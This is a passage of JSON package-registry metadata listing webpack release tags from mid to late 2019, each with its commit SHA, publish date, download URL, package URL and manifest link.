v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw